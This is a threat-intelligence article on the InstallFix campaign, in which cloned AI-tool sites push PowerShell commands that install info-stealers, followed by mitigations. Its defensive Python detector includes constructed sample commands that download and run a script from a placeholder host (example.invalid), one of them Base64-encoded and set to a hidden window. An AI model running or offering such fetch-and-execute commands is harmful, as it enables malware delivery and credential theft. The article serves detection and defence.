root@rebel:~$ cd /news/threats/installfix-campaign-cloned-ai-tool-sites-distribute-info-stealers_
[TIMESTAMP: 2026-03-09 12:19 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

InstallFix Campaign: Cloned AI Tool Sites Distribute Info-Stealers

AI-Assisted Analysis
READ_TIME: 4 min read
// executive briefing tl;dr
  • [01] Threat actors use cloned AI tool websites to trick users into executing malicious PowerShell commands that install info-stealing malware on compromised systems.
  • [02] Users seeking popular AI tools like Midjourney or Sora are targeted through SEO poisoning and fake InstallFix instructions on malicious clones.
  • [03] Organizations must restrict PowerShell execution, educate users on website verification, and monitor for unauthorized network connections to known malware delivery domains.

Overview of the InstallFix Malware Campaign

According to SecurityWeek, threat actors are leveraging the immense popularity of generative AI tools to lure victims into a sophisticated malware distribution scheme. The “InstallFix” campaign relies on high-quality clones of legitimate AI software websites, such as those for Midjourney, OpenAI’s Sora, and various ChatGPT-adjacent utilities. Unlike traditional phishing, which harvests credentials through fake login forms, this campaign employs a deceptive technical support workflow to bypass standard security filters.

The primary objective of the InstallFix campaign is the deployment of info-stealing malware, which targets sensitive data including browser-stored passwords, session cookies, and cryptocurrency wallet configurations. By impersonating trusted AI brands, the attackers capitalize on the user’s desire to access gated or high-performance AI models, often leading them to ignore security warnings in favor of “fixing” a supposed installation error.

Technical Analysis: The Copy-Paste Infection Chain

The infection chain begins when a user navigates to a malicious clone of a popular AI tool site, often arriving via malicious advertisements or SEO poisoning. Once on the site, the user is typically presented with a download button or an “Install Now” prompt. When the user attempts to interact with the site, a simulated error message appears, suggesting that the installation has failed due to a system incompatibility or missing component.

How to detect malicious PowerShell commands from cloned sites

To “fix” the error, the website provides a seemingly helpful technical solution: a PowerShell command that the user is instructed to copy and paste directly into their terminal. This TTP is particularly effective because it is a “living-off-the-land” technique: the initial stage runs in PowerShell rather than as a dropped file, so EDR solutions focused on file-based threats may not flag it. The provided command is usually an obfuscated script designed to download a secondary payload from a remote C2 server.

Security professionals looking to detect malicious PowerShell commands from cloned sites should monitor for PowerShell execution patterns that combine Invoke-WebRequest (IWR) or Invoke-Expression (IEX) with encoded strings. The InstallFix campaign specifically uses these commands to pull down executable files disguised as legitimate system updates or installers.

InstallFix Malware Campaign Analysis: Payload and Impact

The payloads delivered in this campaign are predominantly well-known info-stealers, such as Lumma Stealer and Vidar. These malware families are designed to rapidly exfiltrate data before self-terminating or hiding. Once the PowerShell command is executed, the malware gathers:

  • Browser credentials and autofill data.
  • Files containing sensitive keywords (e.g., “wallet”, “password”, “backup”).
  • Multi-factor authentication (MFA) session tokens, which can allow attackers to bypass secondary security layers.

Analysis of the InstallFix campaign reveals that the attackers are not just targeting individual hobbyists but also corporate employees looking to use AI tools for work. This introduces a significant risk of corporate account takeover and subsequent lateral movement within a compromised network. The use of PowerShell as the delivery mechanism makes this threat particularly dangerous in environments where command-line execution is not strictly audited by the SOC.

Defensive Strategies and AI Tool Website Impersonation Protection

Mitigating the risks associated with the InstallFix campaign requires a multi-layered approach that combines technical controls with user awareness. Organizations must prioritize AI tool website impersonation protection by implementing strict web filtering and DNS-level blocking for newly registered domains that mimic popular AI service providers.

Mitigation Steps for Security Teams

  • Restrict PowerShell Execution: Implement Constrained Language Mode, or use AppLocker or Windows Defender Application Control (WDAC), to prevent the execution of unsigned scripts.
  • Enhance Endpoint Visibility: Enable PowerShell Script Block Logging (Event ID 4104) through Advanced Audit Policy Configuration. This allows the SIEM to flag suspicious commands containing Base64-encoded strings or network-reaching functions.
  • User Education: Train staff to never copy and paste commands from external websites into their terminal, regardless of the perceived error message. Legitimate software providers rarely require manual CLI commands to “fix” a standard installation.
  • Credential Hygiene: Ensure that all high-value accounts are protected by hardware-based MFA, which is more resilient against the session token theft performed by info-stealers.
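As an added illustration of the detection guidance in the PowerShell detection section and the Script Block Logging step above (example code written for this article, not from SecurityWeek or the campaign analysis), the following Python scores constructed Event ID 4104 script block texts: it decodes any Base64 it finds (UTF-16LE, as -EncodedCommand uses) and alerts only when a network fetch is paired with in-memory execution or an encoded command is present, so a plain file download is not flagged. The domain example.invalid and all sample commands are constructed placeholders.

```python
import base64
import re

# Heuristics for PowerShell Script Block Logging (Event ID 4104) text, covering the
# InstallFix pattern described above: IWR/IEX combined with encoded strings.
NETWORK = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadFile)\b", re.I)
EXEC = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_layers(text):
    """Yield (label, text) for the script block itself and for every Base64 blob in it
    that decodes as UTF-16LE (what -EncodedCommand uses) or UTF-8."""
    yield "raw", text
    for blob in set(ENCODED.findall(text)) | set(BASE64_RUN.findall(text)):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid Base64: leave it alone
            continue
        for codec in ("utf-16-le", "utf-8"):
            try:
                yield f"decoded {codec}", raw.decode(codec)
            except UnicodeDecodeError:
                pass


def assess(script_block):
    """Return (suspicious, findings) for one 4104 ScriptBlockText value."""
    findings = set()
    for label, layer in decode_layers(script_block):
        suffix = "" if label == "raw" else f" [{label}]"
        if NETWORK.search(layer):
            findings.add("network fetch" + suffix)
        if EXEC.search(layer):
            findings.add("in-memory execution" + suffix)
        if ENCODED.search(layer):
            findings.add("encoded command" + suffix)

    def has(kind):
        return any(f.startswith(kind) for f in findings)

    # A download by itself is routine admin work; fetch + IEX or any encoded command is not.
    suspicious = (has("network") and has("in-memory")) or has("encoded")
    return suspicious, sorted(findings)


# Constructed sample script blocks (placeholders, not real campaign artifacts).
INLINE_FIX = "IEX (IWR 'http://example.invalid/fix.ps1' -UseBasicParsing)"
ENCODED_FIX = "powershell -nop -w hidden -enc " + base64.b64encode(INLINE_FIX.encode("utf-16-le")).decode()
SAMPLES = {
    "admin": "Get-ChildItem C:\\Users | Where-Object { $_.Name -like 'a*' }",
    "download_only": "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\temp\\report.csv",
    "inline_fix": INLINE_FIX,
    "encoded_fix": ENCODED_FIX,
}

if __name__ == "__main__":
    for name, block in SAMPLES.items():
        print(name, assess(block))
```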

By mapping these activities to the MITRE ATT&CK framework, specifically T1059.001 (Command and Scripting Interpreter: PowerShell) and T1204.001 (User Execution: Malicious Link), defenders can develop detection signatures to identify and block the InstallFix campaign before data exfiltration occurs.
